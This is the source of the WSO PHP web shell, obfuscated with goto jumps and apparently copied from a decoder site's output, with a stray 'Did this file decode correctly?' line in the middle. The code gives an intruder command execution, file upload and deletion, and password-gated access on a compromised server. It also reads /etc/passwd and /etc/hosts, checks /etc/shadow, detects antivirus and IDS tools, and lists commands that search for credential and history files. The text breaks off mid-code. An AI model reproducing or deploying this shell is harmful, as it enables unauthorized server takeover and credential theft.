mysqli_get_client_info() . ")"; } goto T3sY7; T3sY7: if (function_exists("mssql_connect")) { $temp[] = "MSSQL"; } goto oKr71; Kcf2h: echo "<h1>Server security information</h1><div class=content>"; goto deosI; GSa9X: echo "<br>"; goto Ppg7_; zA3JJ: wsoSecParam("Server software", @getenv("SERVER_SOFTWARE")); goto aO8HS; IbU7m: echo "</div>"; goto XTIFZ; XTIFZ: wsoFooter(); goto jAziO; V6Pow: wsoSecParam("Safe mode include dir", @ini_get("safe_mode_include_dir")); goto qT_UQ; zEzgM: $temp = array(); goto I0L0t; DQ0Hi: wsoSecParam("Supported databases", implode(", ", $temp)); goto GSa9X; Ppg7_: if ($GLOBALS["os"] == "nix") { goto yzksH; Pr2du: if (!$GLOBALS["safe_mode"]) { goto tBdFD; b1GnC: wsoSecParam("Userful", implode(", ", $temp)); goto gsw3Q; IArV4: $temp = array(); goto bo6ds; SphFn: wsoSecParam("Hosts", @file_get_contents("/etc/hosts")); goto dOgcI; bo6ds: foreach ($userful as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto b1GnC; VXdNV: wsoSecParam("Danger", implode(", ", $temp)); goto xDJbP; tBdFD: $userful = array("gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzip2", "nc", "locate", "suidperl"); goto j1mm2; zL0U4: foreach ($danger as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto VXdNV; F15O4: echo "<br/>"; goto vzm5g; gsw3Q: $temp = array(); goto zL0U4; AYbzB: wsoSecParam("Downloaders", implode(", ", $temp)); goto F15O4; M0R0C: $downloaders = array("wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"); goto nuthD; dOgcI: echo "<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>"; goto Fh4yv; Fh4yv: if (isset($_POST["p2"], $_POST["p3"]) && is_numeric($_POST["p2"]) && is_numeric($_POST["p3"])) { goto TMVUA; Aagop: wsoSecParam("Users", $temp); goto H4g4C; TMVUA: $temp = ''; goto g4wsK; yuLqo: echo "<br/>"; goto Aagop; g4wsK: for (; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++) { $uid = @posix_getpwuid($_POST["p2"]); if ($uid) { $temp .= join(":", $uid) . "
"; } } goto yuLqo; H4g4C: } goto GP22b; vzm5g: wsoSecParam("HDD space", wsoEx("df -h")); goto SphFn; j1mm2: $danger = array("kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja"); goto M0R0C; xDJbP: $temp = array(); goto pSd_M; pSd_M: foreach ($downloaders as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto AYbzB; nuthD: echo "<br>"; goto IArV4; GP22b: } goto QDcOt; yzksH: wsoSecParam("Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>" : "no"); goto ledym; ESH98: wsoSecParam("OS version", @file_get_contents("/proc/version")); goto ZLZ7x; ZLZ7x: wsoSecParam("Distr name", @file_get_contents("/etc/issue.net")); goto Pr2du; ledym: wsoSecParam("Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>" : "no"); goto ESH98; QDcOt: } else { goto NsBCo; Me9Q1: wsoSecParam("Account Settings", wsoEx("net accounts")); goto RXCoL; NsBCo: wsoSecParam("OS Version", wsoEx("ver")); goto Me9Q1; RXCoL: wsoSecParam("User Accounts", wsoEx("net user")); goto DnuxL; DnuxL: } goto IbU7m; wqp98: wsoHeader(); goto Kcf2h; aO8HS: if (function_exists("apache_get_modules")) { wsoSecParam("Loaded Apache modules", implode(", ", apache_get_modules())); } goto m3Zin; deosI: function wsoSecParam($n, $v) { $v = trim($v); if ($v) { echo "<span>" . $n . ": </span>"; if (strpos($v, "
") === false) { echo $v . "<br>"; } else { echo "<pre class=ml1>" . $v . "</pre>"; } } } goto zA3JJ; jAziO: } goto oHsYW; qljle: if ($cwd[strlen($cwd) - 1] != "/") { $cwd .= "/"; } goto j4eIF; g7ZCc: @ini_set("log_errors", 0); goto ABTpd; XeOpc: if (!function_exists("posix_getpwuid") && strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto lUvYe; KC9ar: function actionStringTools() { goto MBvsT; S0req: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto nYBgB; Oymko: if (!function_exists("hex2ascii")) { function hex2ascii($p) { goto uM0Pu; NG1dD: return $r; goto fKGDN; uM0Pu: $r = ''; goto ac1Yo; ac1Yo: for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } goto NG1dD; fKGDN: } } goto ZMcUd; vUNKP: echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST["p1"]) ? '' : htmlspecialchars(@$_POST["p2"])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px' id='strOutput'>"; goto k5nqW; ZMcUd: if (!function_exists("ascii2hex")) { function ascii2hex($p) { goto cdb2T; O0tgA: for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf("%02X", ord($p[$i])); } goto JVXpM; cdb2T: $r = ''; goto O0tgA; JVXpM: return strtoupper($r); goto I6jbu; I6jbu: } } goto q2kmv; HYxD9: echo "<h1>String conversions</h1><div class=content>"; goto OX44o; awjDW: function wsoRecursiveGlob($path) { goto TkAHe; lEFZ5: if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { wsoRecursiveGlob($item); } } else { if (empty($_POST["p2"]) || @strpos(file_get_contents($item), $_POST["p2"]) !== false) { echo "<a href='#' onclick='g("FilesTools",null,"" . urlencode($item) . "", "view","")'>" . htmlspecialchars($item) . "</a><br>"; } } } } goto fVCol; GUM3F: $paths = @array_unique(@array_merge(@glob($path . $_POST["p3"]), @glob($path . "*", GLOB_ONLYDIR))); goto lEFZ5; TkAHe: if (substr($path, -1) != "/") { $path .= "/"; } goto GUM3F; fVCol: } goto qLbIZ; aUced: if (!function_exists("binhex")) { function binhex($p) { return dechex(bindec($p)); } } goto Oymko; MBvsT: if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } goto aUced; q2kmv: if (!function_exists("full_urlencode")) { function full_urlencode($p) { goto d1_DN; d1_DN: $r = ''; goto D3iJl; YAXHC: return strtoupper($r); goto wfgBE; D3iJl: for ($i = 0; $i < strlen($p); ++$i) { $r .= "%" . dechex(ord($p[$i])); } goto YAXHC; wfgBE: } } goto IHtdM; N3xOi: if (isset($_POST["ajax"])) { goto V2x0a; Wm5Kx: exit; goto IafqZ; x5Jd7: if (in_array($_POST["p1"], $stringTools)) { echo $_POST["p1"]($_POST["p2"]); } goto vD3zd; vD3zd: $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\xd\x9\'\x0") . "';\xa"; goto NED_K; V2x0a: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto LTDt0; LTDt0: ob_start(); goto x5Jd7; NED_K: echo strlen($temp), "
", $temp; goto Wm5Kx; IafqZ: } goto S0req; nYBgB: wsoHeader(); goto HYxD9; k5nqW: if (!empty($_POST["p1"])) { if (in_array($_POST["p1"], $stringTools)) { echo htmlspecialchars($_POST["p1"]($_POST["p2"])); } } goto jZzWZ; OX44o: echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; goto BBAR5; Rfc53: wsoFooter(); goto JMM51; uWngZ: echo "</div><br><h1>Search for hash:</h1><div class=content>\xd\xa \x9<form method='post' target='_blank' name='hf'>
\xa \x9\x9<input type='text' name='hash' style='width:200px;'><br>\xd
<input type='hidden' name='act' value='find'/>
\x9 <input type='button' value='hashcracking.ru' onclick="document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()"><br>
\x9 <input type='button' value='md5.rednoize.com' onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
\xa <input type='button' value='crackfor.me' onclick="document.hf.action='http://crackfor.me/index.php';document.hf.submit()"><br>
\x9 </form></div>"; goto Rfc53; BBAR5: foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; } goto vUNKP; qLbIZ: if (@$_POST["p3"]) { wsoRecursiveGlob($_POST["c"]); } goto uWngZ; jZzWZ: echo "</pre></div><br><h1>Search files:</h1><div class=content>\xd
\x9 <form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding='1' cellspacing='0' width='50%'>\xd
\x9<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\xd\xa\x9\x9 <tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS["cwd"]) . "' style='width:100%'></td></tr>\xd\xa <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
\xa\x9 <tr><td></td><td><input type='submit' value='>>'></td></tr>\xd\xa \x9 </table></form>"; goto awjDW; IHtdM: $stringTools = array("Base64 encode" => "base64_encode", "Base64 decode" => "base64_decode", "Url encode" => "urlencode", "Url decode" => "urldecode", "Full urlencode" => "full_urlencode", "md5 hash" => "md5", "sha1 hash" => "sha1", "crypt" => "crypt", "CRC32" => "crc32", "ASCII to HEX" => "ascii2hex", "HEX to ASCII" => "hex2ascii", "HEX to DEC" => "hexdec", "HEX to BIN" => "hex2bin", "DEC to HEX" => "dechex", "DEC to BIN" => "decbin", "BIN to HEX" => "binhex", "BIN to DEC" => "bindec", "String to lower case" => "strtolower", "String to upper case" => "strtoupper", "Htmlspecialchars" => "htmlspecialchars", "String length" => "strlen"); goto N3xOi; JMM51: } goto xB4MH; sO9OV: $cwd = @getcwd(); goto cUzsD; SG2I5: function WSOstripslashes($array) { return is_array($array) ? array_map("WSOstripslashes", $array) : stripslashes($array); } goto M9YJl; EoPoZ: if ($os == "win") { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => '', "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => '', "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto MrsTM; Cjo7J: $color = "#df5"; goto LNmAT; ocXfq: $_COOKIE = WSOstripslashes($_COOKIE); goto Qn_9k; dPSqc: if (empty($_POST["a"])) { if (isset($default_action) && function_exists("action" . $default_action)) { $_POST["a"] = $default_action; } else { $_POST["a"] = "SecInfo"; } } goto j2Rfu; fj9OS: if ($argc == 3) { $_POST = unserialize(base64_decode($argv[1])); $_SERVER = unserialize(base64_decode($argv[2])); } goto GFRHq; MrsTM: function wsoHeader() { goto E9rcc; FKql5: echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:" . ($GLOBALS["os"] == "win" ? "<br>Drives:" : '') . "</span></td>" . "<td><nobr>" . substr(@php_uname(), 0, 120) . " <a href="" . $explink . "" target=_blank>[exploit-db.com]</a></nobr><br>" . $uid . " ( " . $user . " ) <span>Group:</span> " . $gid . " ( " . $group . " )<br>" . @phpversion() . " <span>Safe mode:</span> " . ($GLOBALS["safe_mode"] ? "<font color=red>ON</font>" : "<font color=green><b>OFF</b></font>") . " <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> " . date("Y-m-d H:i:s") . "<br>" . wsoViewSize($totalSpace) . " <span>Free:</span> " . wsoViewSize($freeSpace) . " (" . (int) ($freeSpace / $totalSpace * 100) . "%)<br>" . $cwd_links . " " . wsoPermsColor($GLOBALS["cwd"]) . " <a href=# onclick="g('FilesMan','" . $GLOBALS["home_cwd"] . "','','','')">[ home ]</a><br>" . $drives . "</td>" . "<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">" . $opt_charsets . "</optgroup></select><br><span>Server IP:</span><br>" . @$_SERVER["SERVER_ADDR"] . "<br><span>Client IP:</span><br>" . $_SERVER["REMOTE_ADDR"] . "</nobr></td></tr></table>" . "<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>" . $menu . "</tr></table><div style="margin:5">"; goto RzURU; M4wyI: $m = array("Sec. Info" => "SecInfo", "Files" => "FilesMan", "Console" => "Console", "Sql" => "Sql", "Php" => "Php", "String tools" => "StringTools", "Bruteforce" => "Bruteforce", "Network" => "Network"); goto JIPap; XR0lk: $totalSpace = $totalSpace ? $totalSpace : 1; goto gDdS4; QoI2U: $drives = ''; goto dJUUJ; E9rcc: if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["default_charset"]; } goto wwJNm; yWMQp: $charsets = array("UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"); goto QAzn_; JIPap: if (!empty($GLOBALS["auth_pass"])) { $m["Logout"] = "Logout"; } goto hedz2; nmRB7: echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST["charset"] . "'><title>" . $_SERVER["HTTP_HOST"] . " - WSO " . WSO_VERSION . "</title>\xd
<style>
\xabody{background-color:#444;color:#e1e1e1;}
\xabody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\xd\xatable.info{ color:#fff;background-color:#222; }
\xaspan,h1,a{ color: {$color} !important; }\xd
span{ font-weight: bolder; }\xd
h1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\xd
div.content{ padding: 5px;margin-left:5px;background-color:#333; }\xd\xaa{ text-decoration:none; }\xd\xaa:hover{ text-decoration:underline; }
\xa.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }\xd\xainput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\xd
form{ margin:0px; }
\xa#toolsTbl{ text-align:center; }
\xa.toolsInp{ width: 300px }
\xa.main th{text-align:left;background-color:#5e5e5e;}\xd\xa.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
\xa.l2{background-color:#333}\xd
pre{font-family:Courier,Monospace;}
</style>
\xa<script>
\xa var c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "';\xd\xa var a_ = '" . htmlspecialchars(@$_POST["a"]) . "'\xd
var charset_ = '" . htmlspecialchars(@$_POST["charset"]) . "';\xd
var p1_ = '" . (strpos(@$_POST["p1"], "
") !== false ? '' : htmlspecialchars($_POST["p1"], ENT_QUOTES)) . "';
var p2_ = '" . (strpos(@$_POST["p2"], "
") !== false ? '' : htmlspecialchars($_POST["p2"], ENT_QUOTES)) . "';\xd\xa var p3_ = '" . (strpos(@$_POST["p3"], "\xa") !== false ? '' : htmlspecialchars($_POST["p3"], ENT_QUOTES)) . "';
var d = document;\xd\xa\x9function set(a,c,p1,p2,p3,charset) {
\xa \x9if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\xd\xa if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
\xa \x9if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\xd
\x9if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
\xa\x9\x9if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\xd
}\xd\xa\x9function g(a,c,p1,p2,p3,charset) {
\x9 set(a,c,p1,p2,p3,charset);\xd\xa\x9 d.mf.submit();\xd
\x9}\xd
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);\xd\xa \x9var params = 'ajax=true';\xd\xa\x9\x9for(i=0;i<d.mf.elements.length;i++)
\xa\x9 \x9params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\xd
\x9\x9sr('" . addslashes($_SERVER["REQUEST_URI"]) . "', params);
\xa\x9}\xd
\x9function sr(url, params) {\xd
\x9if (window.XMLHttpRequest)
\xa \x9 req = new XMLHttpRequest();\xd
\x9\x9else if (window.ActiveXObject)\xd\xa\x9\x9 req = new ActiveXObject('Microsoft.XMLHTTP');\xd
if (req) {\xd
req.onreadystatechange = processReqChange;\xd\xa req.open('POST', url, true);
\xa req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\xd\xa req.send(params);\xd
}
\xa }
\xa\x9function processReqChange() {
if( (req.readyState == 4) )
\xa \x9\x9if(req.status == 200) {\xd
\x9\x9var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');\xd
var arr=reg.exec(req.responseText);\xd
\x9 eval(arr[2].substr(0, arr[1]));\xd\xa\x9\x9\x9} else alert('Request error!');
\xa\x9}
</script>
\xa<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>\xd
<input type=hidden name=a>\xd
<input type=hidden name=c>\xd
<input type=hidden name=p1>
\xa<input type=hidden name=p2>\xd
<input type=hidden name=p3>
\xa<input type=hidden name=charset>\xd
</form>"; goto yrJci; HJ09z: $totalSpace = @disk_total_space($GLOBALS["cwd"]); goto XR0lk; mxXoN: $explink = "http://exploit-db.com/search/?action=search&filter_description="; goto CGFSE; jqLRT: $menu = ''; goto pyClH; znu8e: $kernel = @php_uname("s"); goto mxXoN; IUSK1: for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a href='#' onclick='g("FilesMan",""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "/"; } $cwd_links .= "")'>" . $path[$i] . "/</a>"; } goto yWMQp; QAzn_: $opt_charsets = ''; goto wJ6Eu; hedz2: $m["Self remove"] = "SelfRemove"; goto jqLRT; MFEdT: $n = count($path); goto IUSK1; PbU2y: $path = explode("/", $GLOBALS["cwd"]); goto MFEdT; CGFSE: if (strpos("Linux", $kernel) !== false) { $explink .= urlencode("Linux Kernel " . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . " " . substr($release, 0, 3)); } goto oXY47; yrJci: $freeSpace = @diskfreespace($GLOBALS["cwd"]); goto HJ09z; pyClH: foreach ($m as $k => $v) { $menu .= "<th width="" . (int) (100 / count($m)) . "%">[ <a href="#" onclick="g('" . $v . "',null,'','','')">" . $k . "</a> ]</th>"; } goto QoI2U; wJ6Eu: foreach ($charsets as $item) { $opt_charsets .= "<option value="" . $item . "" " . ($_POST["charset"] == $item ? "selected" : '') . ">" . $item . "</option>"; } goto M4wyI; dJUUJ: if ($GLOBALS["os"] == "win") { foreach (range("c", "z") as $drive) { if (is_dir($drive . ":\")) { $drives .= "<a href="#" onclick="g('FilesMan','" . $drive . ":/')">[ " . $drive . " ]</a> "; } } } goto FKql5; wwJNm: global $color; goto nmRB7; gDdS4: $release = @php_uname("r"); goto znu8e; oXY47: if (!function_exists("posix_getegid")) { goto VMtJd; VMtJd: $user = @get_current_user(); goto RNehq; RNehq: $uid = @getmyuid(); goto kWs3Y; n3X6Y: $group = "?"; goto dyMHz; kWs3Y: $gid = @getmygid(); goto n3X6Y; dyMHz: } else { goto ec83q; yJq0B: $uid = $uid["uid"]; goto nZ1Iw; nZ1Iw: $group = $gid["name"]; goto LgEQ1; LgEQ1: $gid = $gid["gid"]; goto XEe3x; q9aTZ: $user = $uid["name"]; goto yJq0B; ERGtZ: $gid = @posix_getgrgid(posix_getegid()); goto q9aTZ; ec83q: $uid = @posix_getpwuid(posix_geteuid()); goto ERGtZ; XEe3x: } goto HU3s7; HU3s7: $cwd_links = ''; goto PbU2y; RzURU: } goto pXSrD; lUvYe: if (!function_exists("posix_getgrgid") && strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto d62j5; V8rDW: @set_time_limit(0); goto hd5Oa; KCE0z: function wsoWhich($p) { goto qE7x8; bvBsL: if (!empty($path)) { return $path; } goto A0ITv; qE7x8: $path = wsoEx("which " . $p); goto bvBsL; A0ITv: return false; goto xhdvj; xhdvj: } goto HhMRL; guAyk: function wsoScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { goto AwLVq; hfmSV: while (false !== ($filename = readdir($dh))) { $files[] = $filename; } goto Rc9At; Rc9At: return $files; goto dO6EV; AwLVq: $dh = opendir($dir); goto hfmSV; dO6EV: } } goto KCE0z; pXSrD: function wsoFooter() { $is_writable = is_writable($GLOBALS["cwd"]) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>"; echo "\xd\xa</div>\xd
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>\xd\xa\x9<tr>
\x9\x9<td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=submit value='>>'></form></td>
\xa \x9<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\xd
</tr><tr>
\xa\x9 <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
\xa\x9</tr><tr>\xd\xa <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
\xa <td><form method='post' ENCTYPE='multipart/form-data'>
\xa\x9\x9<input type=hidden name=a value='FilesMAn'>
\x9 <input type=hidden name=c value='" . $GLOBALS["cwd"] . "'>\xd
\x9 <input type=hidden name=p1 value='uploadFile'>\xd
\x9\x9<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
\x9\x9<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
\x9</tr></table></div></body></html>"; } goto XeOpc; Qn_9k: function wsoLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); } goto e2q7d; i6mTz: function actionSelfRemove() { goto KQZY3; trHKc: if ($_POST["p1"] != "yes") { wsoHeader(); } goto X7soZ; X7soZ: echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>"; goto tsvXj; KQZY3: if ($_POST["p1"] == "yes") { if (@unlink(preg_replace("!\(\d+\)\s.*!", '', __FILE__))) { die("Shell has been removed"); } else { echo "unlink error!"; } } goto trHKc; tsvXj: wsoFooter(); goto n3JxC; n3JxC: } goto DbGtY; TQr3j: if (!empty($auth_pass)) { if (isset($_POST["pass"]) && md5($_POST["pass"]) == $auth_pass) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])]) || $_COOKIE[md5($_SERVER["HTTP_HOST"])] != $auth_pass) { wsoLogin(); } } goto tZUOM; e2q7d: function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto TQr3j; yXkOt: function wsoViewSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto etiAC; Zxful: exit; ?>Did this file decode correctly?
Original Code
<?php
goto Cjo7J; LqaMO: $safe_mode = @ini_get("safe_mode"); goto zGahs; zGahs: if (!$safe_mode) { error_reporting(0); } goto Gop14; j2Rfu: if (!empty($_POST["a"]) && function_exists("action" . $_POST["a"])) { call_user_func("action" . $_POST["a"]); } goto Zxful; GFRHq: @ini_set("error_log", NULL); goto g7ZCc; N84uU: function actionFilesMan() { goto J7jRR; la8rp: if (class_exists("ZipArchive")) { echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>"; } goto GTtN3; uO4Od: if (!empty($_POST["p1"])) { switch ($_POST["p1"]) { case "uploadFile": if (!@move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) { echo "Can't upload file!"; } break; case "mkdir": if (!@mkdir($_POST["p2"])) { echo "Can't create new dir"; } break; case "delete": goto zgV_d; mm32x: break; goto hEfbk; zgV_d: function deleteDir($path) { goto RrCM3; zxeby: $dh = opendir($path); goto TCJ3G; TCJ3G: while (($item = readdir($dh)) !== false) { $item = $path . $item; if (basename($item) == ".." || basename($item) == ".") { continue; } $type = filetype($item); if ($type == "dir") { deleteDir($item); } else { @unlink($item); } } goto qhDI4; SLRoZ: @rmdir($path); goto ld2N6; RrCM3: $path = substr($path, -1) == "/" ? $path : $path . "/"; goto zxeby; qhDI4: closedir($dh); goto SLRoZ; ld2N6: } goto Jstso; Jstso: if (is_array(@$_POST["f"])) { foreach ($_POST["f"] as $f) { goto Fce39; jTf8C: if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } goto sVDIO; Fce39: if ($f == "..") { continue; } goto NavX2; NavX2: $f = urldecode($f); goto jTf8C; sVDIO: } } goto mm32x; hEfbk: case "paste": goto aIzMf; aIzMf: if ($_COOKIE["act"] == "copy") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { goto DXZu5; OpM7_: $h = @opendir($c . $s); goto XF_lF; XF_lF: while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } goto v_Vn9; DXZu5: mkdir($d . $s); goto OpM7_; v_Vn9: } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { copy_paste($_COOKIE["c"], $f, $GLOBALS["cwd"]); } } elseif ($_COOKIE["act"] == "move") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { goto qKJrU; TXDEI: while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } goto xPGvS; AwOVO: $h = @opendir($c . $s); goto TXDEI; qKJrU: mkdir($d . $s); goto AwOVO; xPGvS: } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { @rename($_COOKIE["c"] . $f, $GLOBALS["cwd"] . $f); } } elseif ($_COOKIE["act"] == "zip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); if ($zip->open($_POST["p2"], 1)) { goto Jun5P; Jun5P: chdir($_COOKIE["c"]); goto T_RpN; MVV2r: $zip->close(); goto 